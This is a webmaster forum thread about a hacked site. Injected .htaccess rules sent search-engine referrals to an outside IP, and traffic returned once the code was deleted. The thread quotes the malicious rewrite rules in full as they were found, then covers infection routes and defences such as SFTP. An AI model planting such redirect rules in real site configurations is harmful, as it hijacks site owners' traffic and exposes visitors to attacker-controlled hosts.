Nasty Website Hack! Stops your Google traffic dead and cuts PR to n/a...

[Colin Evans]

I have been trying to figure out why search engine traffic dried up to one of my more profitable sites and couldn't find out why.

I decided to rebuild the site on my PC using Wamp, and wanted to add a few .htaccess mod's. On opening .htaccess I found this:

Quote:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google.|msn.|live|yahoo.|altavista.|aol.|ask.| eureka.com|lycos.com|hotbot.com|infoseek.com|webcr awler.|excite.|netscape.com|mamma.com|alltheweb.co m|northernlight.com|rambler.ru|aport.ru|yandex.ru| pingwin.ru|http://www.ru|punto.ru|search.comcas...oksmart.com).* [NC]
RewriteRule ^(.*) /501.html [NS,NC,L]

RewriteCond %{HTTP_USER_AGENT} ^.*(bot|urp|msn).* [NC]
RewriteRule ^(.*) $1 [NS,NC,L]
Redirect /501.html http://66.249.28.51

Looks like my site had been hacked at the server level... Seems like search engine bots are being sent to the IP address in the .htaccess

Needless to say I deleted the code pronto... LOL - I've moved the site a few times because I thought it had something to do with the hosting, so I have no idea when it happened.

Has anybody else experienced this?

[update] Since deleting the offending .htaccess code my site started receiving traffic from Google within 24 hours - phew! [/update]

[kavi]

I agree with Nathan. The problem appears to be either with a security issue with a script that you've installed on your website or a leak with your ftp software. I use winscp now for file transfers which supports SFTP - WinSCP Portable | PortableApps.com - Portable software for USB drives

Regards,
Kavi

[Colin Evans]

Hi Nathan - you're right, I've long since stopped allowing WordPress to make changes on a blog (other than the database). Never thought of SFTP though.

Hi Kavi, good to hear from you again - it's been a while. I had a look at WinSCP but don't like it much. I've now started using SFTP with FileZilla, but it comes up with an "Unkown host key" popup - how do you solve that?

[Ron Killian]

Alot of these hacking problems come from pc's getting infected and FTP details getting sniffed out. Just found two clients that had iframe infections. A friend just went through it and that was how they got his, by infecting his pc.

Just a thought.

[Kenneth Fox]

A friend of mine in the web security field wrote an
excellent blog post about this very problem going around.

Check it out:

http://www.wewatchyourwebsite.com/wordpress/?p=181

[Colin Evans]

Hi Ron - I've had a few nasties on my PC in the past so now I regularly is run checks on my PC with a number of anti-virus and anit-malware programs. I'm pretty sure this problem came from one of those past nasties.

Hi Kenneth - That's a thought provoking blog post you provided...

[chatterbox]

This is the first time i've come across such a situation. Never knew Search engine traffic could be blocked/redirected using a hack. Haven't faced such an issue yet but guess i gotta check on my site now.

[Ron Killian]

I agree, that blog post was good, thanks Kenneth.

Just yesterday, I found out two clients (more friends), who's sites I put up and host, got injected with a hidden iframe. Course one was all over me because her site was unreachable with the "Attack Site Reported" message from Google, can't blame her.

First thing I did was get on my host, just like the blog post talked about lol.

I ended up, cleaning it up myself. Another reason I don't want to do websites for friends any more

Also lucky, the warning message came down pretty fast, though I did request a review.

From what I've been reading, and from that blog post, this one is getting past most AV software packages, like any new virus, so we might have it and not have a clue.

[Steven Wagenheim]

Maybe I'm just cranky today, but when I hear stories like this I really want
to wish all hackers a fate worse than death.

Don't these people realize that they're messing with people's livelihoods?

Just makes me sick.

[Ron Killian]

Quote:

Originally Posted by Steven Wagenheim

Maybe I'm just cranky today, but when I hear stories like this I really want
to wish all hackers a fate worse than death.

Don't these people realize that they're messing with people's livelihoods?

Just makes me sick.

It's those days that make me want to get off the net completely.

Luckily they don't happen to often.

[Colin Evans]

Quote:

Originally Posted by Steven Wagenheim

Maybe I'm just cranky today, but when I hear stories like this I really want to wish all hackers a fate worse than death.

LOL - Not as cranky as when you discover your websites have been hacked...